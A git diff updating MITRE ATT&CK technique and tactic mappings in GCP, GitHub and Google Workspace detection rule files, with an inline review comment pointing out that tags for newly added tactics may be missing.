@@ -84,14 +84,31 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Updat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml index d26fdfad9fe..062541f2343 100644 --- a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml +++ b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -82,26 +82,54 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml index 6ba99513f42..5b663d18ff7 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -63,11 +63,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +90,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml index c151731755a..406d9c424c4 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -63,11 +63,42 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +108,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml index 0474776c35d..871858777f2 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -62,11 +62,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,14 +72,14 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -95,9 +90,24 @@ id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" 
@@ -106,12 +116,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1041"
+name = "Exfiltration Over C2 Channel"
+reference = "https://attack.mitre.org/techniques/T1041/"
+
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1041"
-name = "Exfiltration Over C2 Channel"
-reference = "https://attack.mitre.org/techniques/T1041/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
index 6060132006a..6d3e2886d52 100644
--- a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
+++ b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
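Review bot: The new `[[rule.threat]]` entry that closes this hunk adds Defense Evasion (TA0005) to ml_gcp_rare_method_by_user.toml, yet none of that file's hunks (`@@ -4,7`, `@@ -62,11`, `@@ -77,14`, `@@ -95,9`, `@@ -106,12`) touch the rule's `tags` array, which sits above line 62 and is outside the diff. Every tactic named under `rule.threat` is expected to be mirrored by a `Tactic: <name>` entry in `tags`, so unless the tags already contain `"Tactic: Defense Evasion"` this file will be reported by the tag/tactic consistency check; the fix is a one-line addition of that string to the `tags` list. The same gap — a new tactic with no accompanying `tags` hunk — appears in persistence_gcp_iam_service_account_key_deletion (Impact), execution_github_app_deleted (Defense Evasion), execution_github_high_number_of_cloned_repos_from_pat, exfiltration_high_number_of_cloning_by_user, impact_github_repository_activity_from_unusual_ip and credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user (Collection), execution_new_github_app_installed (Initial Access, Persistence), initial_access_github_actions_bot_first_push_to_repo (Impact), persistence_github_org_owner_added and persistence_organization_owner_role_granted (Privilege Escalation), collection_google_drive_ownership_transferred_via_google_workspace (Exfiltration) and defense_evasion_google_workspace_new_oauth_login_from_third_party_application (Persistence). If the tags for these rules were updated in a separate commit of this series, a pointer in the PR description would save reviewers the cross-check.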
@@ -86,14 +86,26 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1531"
+name = "Account Access Removal"
+reference = "https://attack.mitre.org/techniques/T1531/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml
index 84d9cc8278b..c4c1bd5488b 100644
--- a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml
+++ b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/gcp/persistence_gcp_service_account_created.toml b/rules/integrations/gcp/persistence_gcp_service_account_created.toml
index 64c798841be..176344f20a5 100644
--- a/rules/integrations/gcp/persistence_gcp_service_account_created.toml
+++ b/rules/integrations/gcp/persistence_gcp_service_account_created.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/22"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -83,14 +83,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
 reference = "https://attack.mitre.org/techniques/T1136/"
+[[rule.threat.technique.subtechnique]]
+id = "T1136.003"
+name = "Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1136/003/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml
index 5bf9ba190ef..f480ad701fe 100644
--- a/rules/integrations/github/execution_github_app_deleted.toml
+++ b/rules/integrations/github/execution_github_app_deleted.toml
@@ -2,7 +2,7 @@ creation_date = "2023/10/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -67,14 +67,31 @@ configuration where event.dataset == "github.audit" and github.category == "inte
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1648"
 name = "Serverless Execution"
 reference = "https://attack.mitre.org/techniques/T1648/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
index 723fabe54ae..09f3929e3ab 100644
--- a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
+++ b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
@@ -2,7 +2,7 @@ creation_date = "2023/10/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -72,17 +72,34 @@ github.repository_public:false
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1648"
 name = "Serverless Execution"
 reference = "https://attack.mitre.org/techniques/T1648/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1213.003"
+name = "Code Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/003/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
 [rule.threshold]
 field = ["github.hashed_token"]
 value = 1
diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml
index d7a9a7fb68d..d7660e1b6ad 100644
--- a/rules/integrations/github/execution_new_github_app_installed.toml
+++ b/rules/integrations/github/execution_new_github_app_installed.toml
@@ -2,7 +2,7 @@ creation_date = "2023/08/29"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -72,14 +72,39 @@ configuration where event.dataset == "github.audit" and event.action == "integra
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1072"
 name = "Software Deployment Tools"
 reference = "https://attack.mitre.org/techniques/T1072/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1199"
+name = "Trusted Relationship"
+reference = "https://attack.mitre.org/techniques/T1199/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
index b0f024d3a6b..3832a15240f 100644
--- a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
+++ b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -109,3 +109,21 @@ reference = "https://attack.mitre.org/techniques/T1567/001/"
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1213.003"
+name = "Code Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/003/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
index 46b687e9fdb..f93858e672e 100644
--- a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
+++ b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/16"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -50,6 +50,16 @@ reference = "https://attack.mitre.org/tactics/TA0040/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
@@ -78,6 +88,23 @@ id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1213.003"
+name = "Code Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/003/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["source.ip", "github.repo"]
diff --git a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml
index 56e1f025d29..ce69ec2c81b 100644
--- a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml
+++ b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -98,6 +98,16 @@ id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
+[[rule.threat.technique]]
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
+
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
diff --git a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml
index 3273c4e208e..f7975e32147 100644
--- a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml
+++ b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -99,6 +99,16 @@ id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
+[[rule.threat.technique]]
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
+
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
diff --git a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml
index 46a8c27fb5d..db556bfbf9b 100644
--- a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml
+++ b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml
@@ -4,7 +4,7 @@ integration = ["github"]
 maturity = "production"
 min_stack_comments = "mv_contains ES|QL function only available post 9.2 in tech preview"
 min_stack_version = "9.2.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -103,6 +103,16 @@ id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
+[[rule.threat.technique]]
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
+
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
index 59d99cbea86..dd4d72e5c96 100644
--- a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
+++ b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/09"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -84,10 +84,12 @@ event.dataset: "github.audit" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
@@ -100,6 +102,7 @@ reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -110,6 +113,23 @@ id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["github.org_id", "github.repo"]
diff --git a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml
index 15f2ba57bd8..80af6816d13 100644
--- a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml
+++ b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/05"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -84,23 +84,30 @@ from logs-github.audit-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1195.001"
+name = "Compromise Software Dependencies and Development Tools"
+reference = "https://attack.mitre.org/techniques/T1195/001/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -113,12 +120,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml
index 5b6539b9114..6cb779a03d6 100644
--- a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml
+++ b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/28"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -73,23 +73,26 @@ event.dataset:"github.audit" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1195.001"
+name = "Compromise Software Dependencies and Development Tools"
+reference = "https://attack.mitre.org/techniques/T1195/001/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["user.name", "github.actor_ip"]
diff --git a/rules/integrations/github/persistence_github_org_owner_added.toml b/rules/integrations/github/persistence_github_org_owner_added.toml
index 6ebccba2979..ab17df05ed0 100644
--- a/rules/integrations/github/persistence_github_org_owner_added.toml
+++ b/rules/integrations/github/persistence_github_org_owner_added.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -72,19 +72,46 @@ iam where event.dataset == "github.audit" and event.action == "org.add_member" a
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
 reference = "https://attack.mitre.org/techniques/T1136/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1136.003"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1136/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
